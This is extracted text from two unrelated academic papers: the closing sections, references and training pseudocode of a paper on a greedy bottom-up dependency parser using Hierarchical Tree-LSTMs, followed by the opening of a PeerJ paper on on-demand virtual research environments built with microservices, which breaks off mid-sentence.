(for word dropout) 0.25 paug (for exploration training) 0.1 g tanh Table 1: Hyper-parameter values used in experiments Weiss et al (2015) stress the importance of care- ful hyperparameter tuning for achieving top accu- racy in neural network based parser. We did not follow this advice and made very few attempts at hyper-parameter tuning, using manual hill climbing until something seemed to work with reasonable ac- curacy, and then sticking with it for the rest of the experiments. 3https://github.com/clab/cnn/tree/ master/pycnn 7 Experiments and Results We evaluated our parsing model to English and Chi- nese data. For comparison purposes we followed the setup of (Dyer et al., 2015). Data For English, we used the Stanford Depen- dency (SD) (de Marneffe and Manning, 2008) con- version of the Penn Treebank (Marcus et al., 1993), using the standard train/dev/test splitswith the same predicted POS-tags as used in (Dyer et al., 2015; Chen and Manning, 2014). This dataset contains a few non-projective trees. Punctuation symbols are excluded from the evaluation. For Chinese, we use the Penn Chinese Treebank 5.1 (CTB5), using the train/test/dev splits of (Zhang and Clark, 2008; Dyer et al., 2015) with gold part- of-speech tags, also following (Dyer et al., 2015; Chen and Manning, 2014). When using external word embeddings, we also use the same data as (Dyer et al., 2015).4 Experimental configurations We evaluated the parser in several configurations BOT- TOMUPPARSER is the baseline parser, not using the tree-encoding, and instead repre- senting each item in pending solely by the vector-representation (word and POS) of its head word. BOTTOMUPPARSER+HTLSTM is using our Hierarchical Tree LSTM representation. BOTTOMUPPARSER+HTLSTM+BI-LSTM is the Hierarchical Tree LSTM where we additionally use a BI-LSTM encoding for the head words. Finally, we added external, pre-trained word embeddings to the BOTTOMUPPARSER+HTLSTM+BI-LSTM setup. We also evaluated the final parsers in a –POS setup, in which we did not feed the parser with any POS-tags. Results Results for English and Chinese are pre- sented in Tables 2 and 3 respectively. For compar- ison, we also show the results of the Stack-LSTM transition-based parser model of Dyer et al (2015), which we consider to be a state-of-the-art greedy model which is also very competitive with search- based models, with and without pre-trained embed- dings, and with and without POS-tags. 4We thank Dyer et al for sharing their data with us. 453 Dev Test UAS LAS UAS LAS BOTTOMUPPARSER 83.3 79.0 82.7 78.6 +HTLSTM 92.4 90.1 92.0 89.8 +BI-LSTM input 93.0 90.5 92.6 90.2 +external embeddings 93.3 90.8 93.0 90.9 Dyer et al (2015) no external 92.7 90.4 92.4 90.0 Dyer et al (2015) w/ external 93.2 90.9 93.1 90.9 C&M (2014) w/ external 92.2 89.7 91.8 89.6 BOTTOMUP+ALL–POS 92.9 90.5 92.9 90.6 Dyer et al (2015) –POS 93.1 90.4 92.7 90.3 Table 2: English parsing results (SD) Dev Test UAS LAS UAS LAS BOTTOMUPPARSER 79.3 77.1 78.8 76.3 +HTLSTM 86.2 84.5 86.2 84.7 +BI-LSTM 86.2 84.5 86.1 84.4 +external embeddings 87.2 85.7 87.1 85.5 Dyer et al (2015) no external 86.3 84.7 85.7 84.1 Dyer et al (2015) w/ external 87.2 85.9 87.2 85.7 C&M (2014) no external 84.0 82.4 83.9 82.4 BOTTOMUP+ALL –POS 82.9 80.0 82.6 79.5 Dyer et al (2015) –POS 82.8 79.8 82.2 79.1 Table 3: Chinese parsing results (CTB5) The trends are consistent across the two lan- guages. The baseline Bottom-Up parser performs very poorly. This is expected, as only the head- word of each subtree is used for prediction. When adding the tree-encoding, results jump to near state- of-the-art accuracy, suggesting that the composed vector representation is indeed successful in captur- ing predictive structural information. Replacing the head-words with their BI-LSTM encodings results in another increase in accuracy for English, outper- forming the Dyer et al (S-LSTM no external) models on the test-set. Adding the external pre-trained em- beddings further improves the results for both our parser and Dyer et al’s model, closing the gap be- tween them. When POS-tags are not provided as input, the numbers for both parsers drop. The drop is small for English and large for Chinese, and our parser seem to suffer a little less than the Dyer et al model. Importance of the dynamic oracle We also eval- uate the importance of using the dynamic oracle and error-exploration training, and find that they are in- deed important for achieving high parsing accura- cies with our model (Table 4). English Chinese UAS LAS UAS LAS RAND 93.0 90.5 86.2 84.5 RAND-NODYN 92.2 89.8 85.7 84.1 EXT 93.3 90.8 87.2 85.7 EXT-NODYN 92.7 90.4 86.6 85.1 Table 4: Effect of the error-exploration training (dynamic-oracle) on dev set accuracy in English and Chi- nese. RAND: random initialization. EXT: pre-trained ex- ternal embeddings. When training without error-exploration (that is, the parser follows only correct actions during train- ing and not using the dynamic aspect of the ora- cle), accuracies of unseen sentences drop by be- tween 0.4 and 0.8 accuracy points (average 0.58). This is consistent with previous work on training with error-exploration and dynamic oracles (Gold- berg and Nivre, 2013), showing that the technique is not restricted to models trained with sparse linear models. Comparison to other state-of-the-art parsers Our main point of comparison is the model of Dyer et al, which was chosen because it is (a) a very strong parsing model; and (b) is the closest to ours in the lit- erature: a greedy parsing model making heavy use of LSTMs. To this end, we tried to make the com- parison to Dyer et al as controlled as possible, using the same dependency annotation schemes, as well as the same predicted POS-tags and the pre-trained embeddings (when applicable). It is also informative to position our results with respect to other state-of-the-art parsing results re- ported in the literature, as we do in Table 5. Here, some of the comparisons are less direct: some of the results use different dependency annotation schemes5, as well as different predicted POS-tags, and different pre-trained word embeddings. While the numbers are not directly comparable, they do give a good reference as to the expected range of 5Our English parsing experiments use the Stanford Depen- dencies scheme, while other work use less informative depen- dency relations which are based on the Penn2Malt converter, using the Yamada and Matsumoto head rules. From our expe- rience, this conversion is somewhat easier to parse, resulting in numbers which are about 0.3-0.4 points higher than Stanford Dependencies. 454 state-of-the-art parsing results. Our system’s En- glish parsing results are in range of state-of-the-art and the Chinese parsing results surpass it. These numbers are achieved while using a greedy, bottom up parsing method without any search, and while relying solely on the compositional tree representa- tions. 8 Related Work We survey two lines of related work: methods for encoding trees as vectors, and methods for parsing with vector representations. The popular approach for encoding trees as vec- tors is using recursive neural networks (Goller and Kuchler, 1996; Socher et al., 2010; Tai et al., 2015). Recursive neural networks represent the vector of a parent node in a tree as a function of its chil- dren nodes. However, the functions are usually re- stricted to having a fixed maximum arity (usually two) (Socher et al., 2010; Tai et al., 2015; Socher, 2014). While trees can be binarized to cope with the arity restriction, doing so results in deep trees which in turn leads to the vanishing gradient problem when training. To cope with the vanishing gradients, (Tai et al., 2015) enrich the composition function with a gating mechanism similar to that of the LSTM, resulting in the so-called Tree-LSTM model. An- other approach is to allow arbitrary arities but ignor- ing the sequential nature of the modifiers, e.g. by using a bag-of-modifiers representation or a convo- lutional layer (Tai et al., 2015; Zhu et al., 2015). In contrast, our tree encoding method naturally allows for arbitrary branching trees by relying on the well established LSTM sequence model, and using it as a black box. Very recently, Zhang et al. (2015) pro- posed an RNN-based tree encoding which is similar to ours in encoding the sequence of modifiers as an RNN. Unlike our bottom-up encoder, their method works top-down, and is therefore not readily appli- cable for parsing. On the other hand the top-down approach is well suited for generation. In future work, it could be interesting to combine the bottom- up and top-down approaches in an encoder-decoder framework (Sutskever et al., 2014; Kiros et al., 2015). Work by Dyer et al (2016), that was submit- ted in parallel to ours, introduces a similar LSTM- based representation of syntactic constituents in the context of phrase-grammar parsing. In terms of parsing with vector representations, there are four dominant approaches: search based parsers that use local features that are fed to a neural-network classifier (Pei et al., 2015; Durrett and Klein, 2015); greedy transition based parsers that use local features that are fed into a neural- network classifier (Chen and Manning, 2014; Weiss et al., 2015), sometimes coupled with a node com- position function (Dyer et al., 2015; Watanabe and Sumita, 2015); bottom up parsers that rely solely on recursively combined vector encodings of sub- trees (Socher et al., 2010; Stenetorp, 2013; Socher et al., 2013a); and parse-reranking approaches that first produce a k-best list of parses using a traditional parsing technique, and then score the trees based on a recursive vector encoding of each node (Le and Zuidema, 2014; Le and Zuidema, 2015; Zhu et al., 2015). Our parser is a greedy, bottom up parser that re- lies on compositional vector encodings of subtrees as its sole set of features. Unlike the re-ranking ap- proaches, we do not rely on an external parser to provide k-best lists. Unlike the bottom-up parser in (Socher et al., 2010) that only parses sentences of up to 15 words and the parser of (Stenetorp, 2013) that achieves very low parsing accuracies, we parse ar- bitrary sentences with near state-of-the-art accuracy. Unlike the bottom up parser in (Socher et al., 2013a) we do not make use of a grammar. The parser of (Weiss et al., 2015) obtains exceptionally high re- sults using local features and no composition func- tion. The greedy version of their parser uses exten- sive tuning of hyper-parameters and network depth in order to squeeze every possible bit of accuracy. Adding beam search on top of that further improves results. Due to our much more limited resources, we did not perform a methodological search over hyper-parameters, and explored only a tiny space of the possible hyper-parameters, and our parser does not perform search. Finally, perhaps closest to our approach is the greedy, transition-based parser of (Dyer et al., 2015) that also works in a bottom- up fashion, and incorporates an LSTM encoding of the input tokens and hierarchical vector composi- tion into its scoring mechanism. Indeed, that parser obtains similar scores to ours, although we obtain somewhat better results when not using pre-trained embeddings. We differ from the parser of Dyer et 455 System Method Representation Emb PTB-YM PTB-SD CTB Runtime ZhangNivre11 transition (beam) large feature set (sparse) – 92.9 – 86.0 O(n)+ Martins13 graph, 3rd order+ large feature set (sparse) – 92.8 93.07 – O(n4) Pei15 graph, 2nd order large feature set (dense) – 92.99 – – O(n3) This Work EasyFirst (greedy) Rec-LSTM encoding – – 92.6 86.1 O(n log n) Weiss15 transition (greedy) large feature set (dense) YES – 93.19 – O(n) Weiss15 transition (beam) large feature set (dense) YES – 93.99 – O(n)+ Pei15 graph, 2nd order large feature set (dense) YES 93.29 – – O(n3) LeZuidema14 reranking /blend inside-outside recursive net YES 93.12 93.84 – O(n3) Zhu15 reranking /blend recursive conv-net YES 93.83 – 85.71 O(n)+ This Work EasyFirst (greedy) Rec-LSTM encoding YES – 93.0 87.1 O(n log n) Table 5: Parsing results (UAS) of various state-of-the-art parsing systems on the English and Chinese datasets. The systems that use embeddings use different pre-trained embeddings. English results use predicted POS tags (different systems use different taggers), while Chinese results use gold POS tags. PTB-YM: English PTB, Yamada and Matsumoto head rules. PTB-SD: English PTB, Stanford Dependencies (different systems may use different versions of the Stanford converter. CTB: Chinese Treebank. reranking /blend in method column indicates a reranking system where the reranker score is interpolated with the base-parser’s score. The reranking systems’ runtimes are those of the base parsers they use. O(n)+ indicates a linear-time system with a large multiplicative constant. The different systems and the numbers reported from them are taken from: ZhangNivre11: (Zhang and Nivre, 2011); Martins13: (Martins et al., 2013); Weiss15 (Weiss et al., 2015); Pei15: (Pei et al., 2015); LeZuidema14 (Le and Zuidema, 2014); Zhu15: (Zhu et al., 2015). al by having a more elaborate vector-composition function, relying solely on the compositional repre- sentations, and performing fully bottom-up parsing without being guided by a stack-and-buffer control structure. 9 Conclusions and Future Work We suggest a compositional vector representation of parse trees that relies on a recursive combination of recurrent-neural network encoders, and demonstrate its effectiveness by integrating it in a bottom-up easy-first parser. Future extensions in terms of pars- ing include the addition of beam search, handling of unknown-words using character-embeddings, and adapting the algorithm to constituency trees. We also plan to establish the effectiveness of our Hierar- chical Tree-LSTM encoder by applying it to more semantic vector representation tasks, i.e. training tree representation for capturing sentiment (Socher et al., 2013b; Tai et al., 2015), semantic sentence similarity (Marelli et al., 2014) or textual inference (Bowman et al., 2015). Acknowledgements This research is supported by the Intel Collaborative Research Institute for Com- putational Intelligence (ICRI-CI) and the Israeli Sci- ence Foundation (grant number 1555/15). References Ian Goodfellow Yoshua Bengio and Aaron Courville. 2016. Deep learning. Book in preparation for MIT Press, http://www.deeplearningbook.org. Samuel R. Bowman, Gabor Angeli, Christopher Potts, and Christopher D. Manning. 2015. A large annotated corpus for learning natural language inference. In Pro- ceedings of the 2015 Conference on Empirical Meth- ods in Natural Language Processing, pages 632–642, Lisbon, Portugal, September. Association for Compu- tational Linguistics. Danqi Chen and Christopher Manning. 2014. A fast and accurate dependency parser using neural networks. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 740–750, Doha, Qatar, October. Association for Computational Linguistics. Kyunghyun Cho. 2015. Natural language under- standing with distributed representation. CoRR, abs/1511.07916. Michael Collins. 1997. Three generative, lexicalised models for statistical parsing. In Proceedings of the 35th Annual Meeting of the Association for Computa- tional Linguistics, pages 16–23, Madrid, Spain, July. Association for Computational Linguistics. Marie-Catherine de Marneffe and Christopher D. Man- ning. 2008. Stanford dependencies manual. Techni- cal report, Stanford University. Greg Durrett and Dan Klein. 2015. Neural crf parsing. In Proceedings of the 53rd Annual Meeting of the As- sociation for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Volume 1: Long Papers), pages 302–312, 456 Beijing, China, July. Association for Computational Linguistics. Chris Dyer, Miguel Ballesteros, Wang Ling, Austin Matthews, and Noah A. Smith. 2015. Transition- based dependency parsing with stack long short-term memory. In Proceedings of the 53rd Annual Meet- ing of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Volume 1: Long Papers), pages 334–343, Beijing, China, July. Association for Com- putational Linguistics. Chris Dyer, Adhiguna Kuncoro, Miguel Ballesteros, and Noah A. Smith. 2016. Recurrent neural network grammars. In Proceedings of the 2016 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Tech- nologies, pages 199–209, San Diego, California, June. Association for Computational Linguistics. Jason Eisner. 1996. Three new probabilistic models for dependency parsing: An exploration. In 16th Interna- tional Conference on Computational Linguistics, Pro- ceedings of the Conference, COLING 1996, Center for Sprogteknologi, Copenhagen, Denmark, August 5-9, 1996, pages 340–345. Jason Eisner. 2000. Bilexical grammars and their cubic- time parsing algorithms. Advances in Probabilistic and Other Parsing Technologies. Jeffrey L. Elman. 1990. Finding structure in time. Cog- nitive Science, 14(2):179–211. Yoav Goldberg and Michael Elhadad. 2010. An effi- cient algorithm for easy-first non-directional depen- dency parsing. In Human Language Technologies: The 2010 Annual Conference of the North American Chapter of the Association for Computational Linguis- tics, pages 742–750, Los Angeles, California, June. Association for Computational Linguistics. Yoav Goldberg and Joakim Nivre. 2012. A dynamic ora- cle for arc-eager dependency parsing. In Proceedings of COLING 2012, pages 959–976, Mumbai, India, De- cember. The COLING 2012 Organizing Committee. Yoav Goldberg and Joakim Nivre. 2013. Training deterministic parsers with non-deterministic oracles. Transactions of the Association for Computational Linguistics, 1:403–414. Yoav Goldberg. 2015. A primer on neural net- work models for natural language processing. CoRR, abs/1510.00726. Christoph Goller and Andreas Kuchler. 1996. Learning task-dependent distributed representations by back- propagation through structure. In Neural Networks, 1996., IEEE International Conference on, volume 1, pages 347–352. IEEE. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation, 9(8):1735– 1780. Ozan Irsoy and Claire Cardie. 2014. Opinion mining with deep recurrent neural networks. In Proceedings of the 2014 Conference on Empirical Methods in Nat- ural Language Processing (EMNLP), pages 720–728, Doha, Qatar, October. Association for Computational Linguistics. Mohit Iyyer, Varun Manjunatha, Jordan Boyd-Graber, and Hal Daumé III. 2015. Deep unordered composi- tion rivals syntactic methods for text classification. In Proceedings of the 53rd Annual Meeting of the Associ- ation for Computational Linguistics and the 7th Inter- national Joint Conference on Natural Language Pro- cessing (Volume 1: Long Papers), pages 1681–1691, Beijing, China, July. Association for Computational Linguistics. Diederik P. Kingma and Jimmy Ba. 2015. Adam: A method for stochastic optimization. In Proceedings of the 3rd International Conference for Learning Repre- sentations, San Diego, California. Ryan Kiros, Yukun Zhu, Ruslan Salakhutdinov, Richard S. Zemel, Raquel Urtasun, Antonio Torralba, and Sanja Fidler. 2015. Skip-thought vectors. In Advances in Neural Information Processing Systems 28: Annual Conference on Neural Information Processing Systems 2015, December 7-12, 2015, Montreal, Quebec, Canada, pages 3294–3302. Sandra Kübler, Ryan T. McDonald, and Joakim Nivre. 2009. Dependency Parsing. Synthesis Lectures on Human Language Technologies. Morgan & Claypool Publishers. Phong Le and Willem Zuidema. 2014. The inside- outside recursive neural network model for depen- dency parsing. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Process- ing (EMNLP), pages 729–739, Doha, Qatar, October. Association for Computational Linguistics. Phong Le and Willem Zuidema. 2015. The forest con- volutional network: Compositional distributional se- mantics with a neural chart and without binarization. In Proceedings of the 2015 Conference on Empiri- cal Methods in Natural Language Processing, pages 1155–1164, Lisbon, Portugal, September. Association for Computational Linguistics. Wang Ling, Chris Dyer, Alan W. Black, and Isabel Tran- coso. 2015. Two/too simple adaptations of word2vec for syntax problems. In NAACL HLT 2015, The 2015 Conference of the North American Chapter of the As- sociation for Computational Linguistics: Human Lan- guage Technologies, Denver, Colorado, USA, May 31 - June 5, 2015, pages 1299–1304. 457 Ji Ma, Tong Xiao, Jingbo Zhu, and Feiliang Ren. 2012. Easy-first Chinese POS tagging and dependency pars- ing. In Proceedings of COLING 2012, pages 1731– 1746, Mumbai, India, December. The COLING 2012 Organizing Committee. Ji Ma, Jingbo Zhu, Tong Xiao, and Nan Yang. 2013. Easy-first pos tagging and dependency parsing with beam search. In Proceedings of the 51st Annual Meet- ing of the Association for Computational Linguistics (Volume 2: Short Papers), pages 110–114, Sofia, Bul- garia, August. Association for Computational Linguis- tics. Mitchell P. Marcus, Beatrice Santorini, and Mary Ann Marcinkiewicz. 1993. Building a large annotated cor- pus of English: The Penn Treebank. Computational Linguistics, 19(2):313–330. Marco Marelli, Luisa Bentivogli, Marco Baroni, Raf- faella Bernardi, Stefano Menini, and Roberto Zampar- elli. 2014. Semeval-2014 task 1: Evaluation of com- positional distributional semantic models on full sen- tences through semantic relatedness and textual entail- ment. In Proceedings of the 8th International Work- shop on Semantic Evaluation (SemEval 2014), pages 1–8, Dublin, Ireland, August. Association for Compu- tational Linguistics and Dublin City University. Andre Martins, Miguel Almeida, and Noah A. Smith. 2013. Turning on the turbo: Fast third-order non- projective turbo parsers. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (Volume 2: Short Papers), pages 617–622, Sofia, Bulgaria, August. Association for Computa- tional Linguistics. Ryan McDonald. 2006. Discriminative Training and Spanning Tree Algorithms for Dependency Parsing. Ph.D. thesis, University of Pennsylvania. Tomas Mikolov, Martin Karafiát, Lukás Burget, Jan Cernocký, and Sanjeev Khudanpur. 2010. Re- current neural network based language model. In INTERSPEECH 2010, 11th Annual Conference of the International Speech Communication Association, Makuhari, Chiba, Japan, September 26-30, 2010, pages 1045–1048. Wenzhe Pei, Tao Ge, and Baobao Chang. 2015. An ef- fective neural network model for graph-based depen- dency parsing. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguis- tics and the 7th International Joint Conference on Nat- ural Language Processing (Volume 1: Long Papers), pages 313–322, Beijing, China, July. Association for Computational Linguistics. Mike Schuster and Kuldip K. Paliwal. 1997. Bidirec- tional recurrent neural networks. IEEE Trans. Signal Processing, 45(11):2673–2681. Richard Socher, Christopher Manning, and Andrew Ng. 2010. Learning Continuous Phrase Representations and Syntactic Parsing with Recursive Neural Net- works. In Proceedings of the Deep Learning and Unsupervised Feature Learning Workshop of (NIPS) 2010, pages 1–9. Richard Socher, John Bauer, Christopher D. Manning, and Andrew Y. Ng. 2013a. Parsing with composi- tional vector grammars. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics, ACL 2013, 4-9 August 2013, Sofia, Bul- garia, Volume 1: Long Papers, pages 455–465. Richard Socher, Alex Perelygin, Jean Wu, Jason Chuang, Christopher D. Manning, Andrew Ng, and Christopher Potts. 2013b. Recursive deep models for semantic compositionality over a sentiment treebank. In Pro- ceedings of the 2013 Conference on Empirical Meth- ods in Natural Language Processing, pages 1631– 1642, Seattle, Washington, USA, October. Association for Computational Linguistics. Richard Socher. 2014. Recursive Deep Learning For Natural Language Processing and Computer Vision. Ph.D. thesis, Stanford University, August. Pontus Stenetorp. 2013. Transition-based Dependency Parsing Using Recursive Neural Networks. In Deep Learning Workshop at the 2013 Conference on Neural Information Processing Systems (NIPS), Lake Tahoe, Nevada, USA, December. Ilya Sutskever, Oriol Vinyals, and Quoc V. Le. 2014. Se- quence to sequence learning with neural networks. In Advances in Neural Information Processing Systems 27: Annual Conference on Neural Information Pro- cessing Systems 2014, December 8-13 2014, Montreal, Quebec, Canada, pages 3104–3112. Kai Sheng Tai, Richard Socher, and Christopher D. Man- ning. 2015. Improved semantic representations from tree-structured long short-term memory networks. In Proceedings of the 53rd Annual Meeting of the Associ- ation for Computational Linguistics and the 7th Inter- national Joint Conference on Natural Language Pro- cessing (Volume 1: Long Papers), pages 1556–1566, Beijing, China, July. Association for Computational Linguistics. Stephen Tratz and Eduard Hovy. 2011. A fast, accurate, non-projective, semantically-enriched parser. In Pro- ceedings of the 2011 Conference on Empirical Meth- ods in Natural Language Processing, pages 1257– 1268, Edinburgh, Scotland, UK., July. Association for Computational Linguistics. Taro Watanabe and Eiichiro Sumita. 2015. Transition- based neural constituent parsing. In Proceedings of the 53rd Annual Meeting of the Association for Com- putational Linguistics and the 7th International Joint Conference on Natural Language Processing (Volume 458 1: Long Papers), pages 1169–1179, Beijing, China, July. Association for Computational Linguistics. David Weiss, Chris Alberti, Michael Collins, and Slav Petrov. 2015. Structured training for neural network transition-based parsing. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Volume 1: Long Pa- pers), pages 323–333, Beijing, China, July. Associa- tion for Computational Linguistics. Yue Zhang and Stephen Clark. 2008. A tale of two parsers: Investigating and combining graph-based and transition-based dependency parsing. In Proceedings of the 2008 Conference on Empirical Methods in Nat- ural Language Processing, pages 562–571, Honolulu, Hawaii, October. Association for Computational Lin- guistics. Yue Zhang and Joakim Nivre. 2011. Transition-based dependency parsing with rich non-local features. In Proceedings of the 49th Annual Meeting of the Asso- ciation for Computational Linguistics: Human Lan- guage Technologies, pages 188–193, Portland, Ore- gon, USA, June. Association for Computational Lin- guistics. Xingxing Zhang, Liang Lu, and Mirella Lapata. 2015. Tree recurrent neural networks with application to lan- guage modeling. CoRR, abs/1511.00060. Chenxi Zhu, Xipeng Qiu, Xinchi Chen, and Xuanjing Huang. 2015. A re-ranking model for dependency parser with recursive convolutional neural network. In Proceedings of the 53rd Annual Meeting of the Associ- ation for Computational Linguistics and the 7th Inter- national Joint Conference on Natural Language Pro- cessing (Volume 1: Long Papers), pages 1159–1168, Beijing, China, July. Association for Computational Linguistics. 459 Appendix: Training Algorithm Pseudocode Algorithm 3 Training on annotated corpus 1: Input: Sentences w1, . . . ,wm 2: Input: Tree annotations T1, . . . ,Tm 3: Input: Number of epochs to train 4: V ← InitializeV ectors() 5: Loss ← [] 6: for epoch ∈{1, . . . ,Epochs} do 7: for S,T ∈{(w1,T1), . . . ,(wm,Tm)} do 8: Loss ← TrainSentence(S,V [w1, . . . ,wn],T,Loss) 9: if |Loss| > 50 then 10: SumLoss ← sum(Loss) 11: Call ADAM to minimize SumLoss 12: Loss ← [] (See Algorithm 4, training of a single sentence, on next page.) 460 Algorithm 4 Training on a single sentence with dynamic oracle algorithm 1: function TRAINSENTENCE(w,v,T,Loss) 2: Input: Sentence w = w1, . . . ,wn 3: Input: Vectors vi corresponding to inputs wi 4: Input: Annotated tree T in the form of (h,m,rel) triplets 5: Input: List Loss to which loss expressions are added 6: for i ∈ 1, . . . ,n do 7: unassigned[i] ←|Children(wi)| 8: pend[i].id ← i 9: pend[i].el ← RNNL.init().append(vi) 10: pend[i].er ← RNNR.init().append(vi) 11: while |pend| > 1 do 12: G,W ←{} ,{} 13: for (i,d,rel) ∈{1 ≤ i < |pend|,d ∈{l,r},rel ∈ Relations} do 14: if d = l then m,h ← pend[i], pend[i + 1] 15: else m,h ← pend[i + 1], pend[i] 16: if unassigned[m.id] 6= 0∨∃`6=rel(h,m,`) ∈ T then 17: W.append((h,m,rel)) 18: else G.append((h,m,rel)) 19: hG,mG,relG ← argmax(i,d,`)∈GScore(pend,i,d,`) 20: hW ,mW ,relW ← argmax(i,d,`)∈W Score(pend,i,d,`) 21: scoreG ← Score(hG,mG,relG) 22: scoreW ← Score(hW ,mW ,relW ) 23: if scoreG −scoreW < 0 then 24: h,m,rel,score ← hW ,mW ,relW ,scoreW 25: else if scoreG −scoreW > 1∨random() < paug then 26: h,m,rel,score ← hG,mG,relG,scoreG 27: else 28: h,m,rel,score ← hW ,mW ,relW ,scoreW 29: if scoreG −score < 1 then 30: Loss.append(1−scoreG + score) 31: m.c = m.el ◦m.er 32: m.enc = g(W(m.c◦rel) + b) 33: if h.id < m.id then h.el.append(m.enc) 34: else h.er.append(m.enc) 35: unassigned[TParent(m).id] ← unassigned[TParent(m).id]−1 36: pend.remove(m) 37: return Loss 461 462 work_5uau7ub4i5hn7kt6ojw35x4dxi ---- Submitted 21 May 2019 Accepted 10 October 2019 Published 11 November 2019 Corresponding author Marco Capuccini, marco.capuccini@farmbio.uu.se Academic editor Daniel Katz Additional Information and Declarations can be found on page 20 DOI 10.7717/peerj-cs.232 Copyright 2019 Capuccini et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS On-demand virtual research environments using microservices Marco Capuccini1,2, Anders Larsson3, Matteo Carone2, Jon Ander Novella3, Noureddin Sadawi4, Jianliang Gao4, Salman Toor1 and Ola Spjuth2 1 Department of Information Technology, Uppsala University, Uppsala, Sweden 2 Department of Pharmaceutical Biosciences, Uppsala University, Uppsala, Sweden 3 National Bioinformatics Infrastructure Sweden, Uppsala University, Uppsala, Sweden 4 Department of Surgery and Cancer, Imperial College London, London, United Kingdom ABSTRACT The computational demands for scientific applications are continuously increasing. The emergence of cloud computing has enabled on-demand resource allocation. However, relying solely on infrastructure as a service does not achieve the degree of flexibility required by the scientific community. Here we present a microservice-oriented methodology, where scientific applications run in a distributed orchestration platform as software containers, referred to as on-demand, virtual research environments. The methodology is vendor agnostic and we provide an open source implementation that supports the major cloud providers, offering scalable management of scientific pipelines. We demonstrate applicability and scalability of our methodology in life science applications, but the methodology is general and can be applied to other scientific domains. Subjects Bioinformatics, Computational Biology, Distributed and Parallel Computing, Scientific Computing and Simulation, Software Engineering Keywords Microservices, Cloud computing, Virtual research environments, Application containers, Orchestration INTRODUCTION Modern science is increasingly driven by compute and data-intensive processing. Datasets are increasing in size and are not seldom in the range of gigabytes, terabytes or even petabytes and at the same time large-scale computations may require thousands of cores (Laure & Edlund, 2012). Accessing adequate e-infrastructure therefore represents a major challenge in science. Further, the need for computing power can vary a lot during the course of a research project and large resources are generally needed only when large-scale computations are being executed (Lampa et al., 2013; Dahlö et al., 2018). To this extent, moving analyses to cloud resources represents an interesting opportunity from an investment perspective. Indeed, cloud resources come as a configurable virtual infrastructure that can be allocated and released as needed with a pay-per-use pricing model (Armbrust et al., 2009). However, this way of procuring resources introduces a layer of complexity that researchers may find hard to cope with; configuring virtual resources requires substantial technical skills (Weerasiri et al., 2017) and it is generally a tedious and repetitive task when it is done on demand. Therefore, when running scientific applications How to cite this article Capuccini M, Larsson A, Carone M, Novella JA, Sadawi N, Gao J, Toor S, Spjuth O. 2019. On-demand virtual re- search environments using microservices. PeerJ Comput. Sci. 5:e232 http://doi.org/10.7717/peerj-cs.232 https://peerj.com/computer-science mailto:marco.capuccini@farmbio.uu.se https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.232 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.232 on cloud, there is a need for a methodology to aid this process. In addition, to promote sustainability, this methodology should be generally applicable over multiple research domains, hence allowing to compose working environments from established scientific software components. The idea of allocating composable, on-demand working environments on a ‘‘global virtual infrastructure’’ was envisioned by Candela, Castelli & Pagano (2013). These working environments, which comprehensively serve the needs of a community of practice, are commonly referred to as Virtual Research Environments (VREs). Roth et al. (2011) and Assante et al. (2019) identify cloud resources as the underlying ‘‘global virtual infrastructure’’ for these systems and provide two similar implementations that offer on-demand allocation of VREs. Both implementations enable to dynamically compose VREs from a collection of scientific applications, which are nevertheless installed directly on Virtual Machines (VMs). Following this approach, due to the remarkably heterogeneous landscape of scientific software packages, one will almost inevitably encounter conflicting dependencies (Williams et al., 2016). The technology that has been recently introduced under the umbrella of microservice-oriented architecture (see ‘Microservice-oriented architecture and technology’) has cleared the way for a remedy to this problem, providing an improved mechanism for isolating scientific software (Williams et al., 2016). The idea consists of introducing an engine that leverages on kernel namespaces to isolate applications at runtime. The resulting software environments are lightweight, easy and fast to instantiate, and they are commonly referred to as containers. Noticeable efforts in leveraging this technology to deliver improved VREs were made by the PhenoMeNal project (in medical metabolomics) (Peters et al., 2018), by the EXTraS project (in astrophysics) (D’Agostino et al., 2017) and by the Square Kilometer Array (SKA) project (in radio astronomy) (Wu et al., 2017). However, despite of microservice-oriented applications being consider the gold standard of cloud-native systems, EXTraS and SKA run their VREs on dedicated servers. Here we introduce a general methodology to allocate VREs on demand using cloud resources—which we have also implemented in PhenoMeNal. The methodology that we introduce in this paper addresses a number of research questions that arise when designing on-demand VREs using microservices. Firstly, allocating virtual infrastructure and setting up the required middleware is hard for non-IT experts. Thus, we face the question of how to provide a seamless allocation procedure for scientists while still enabling a good level of configurability for a specific set up. Secondly, scientists should be able to run VREs on multiple clouds while operating with the same immutable infrastructure and tooling ecosystem. When using public cloud resources, this is challenging due to the heterogeneity of vendor-specific features and tools. Further, it is common in academic settings to leverage commodity clouds that run on premises. While it is important to support these systems as regulations may forbid certain datasets to be handled in public settings, commodity clouds offer a reduced set of features; we face the question of how to enable immutable VREs in commercial and commodity settings. Lastly, we face the question of how to provide VREs that scale reasonably well. To this extent, there are two main aspects that we cover in this paper: (1) scaling of scientific analyses and (2) scaling of VRE instantiation. In connection to this second point, it is important to consider Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 2/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.232 that our methodology is designed around the idea of on-demand, short-lived deployments; high availability is not crucial while instantiation speed is of great importance. Based on our methodology, we implemented KubeNow: a comprehensive open-source platform for the instantiation of on-demand VREs. Please notice that we use the term platform as opposed to Platform as a Service (PaaS), because KubeNow comes with a Command-Line Interface (CLI) that operates from the user’s workstation—rather than providing a publicly available Application Programming Interface (API). The platform is currently in production as part of the PhenoMeNal project and we employ such use case to demonstrate the applicability of the proposed methodology. In summary, our key contributions are as follows. • We introduce a general methodology for on-demand VREs with microservices (‘On- Demand VREs 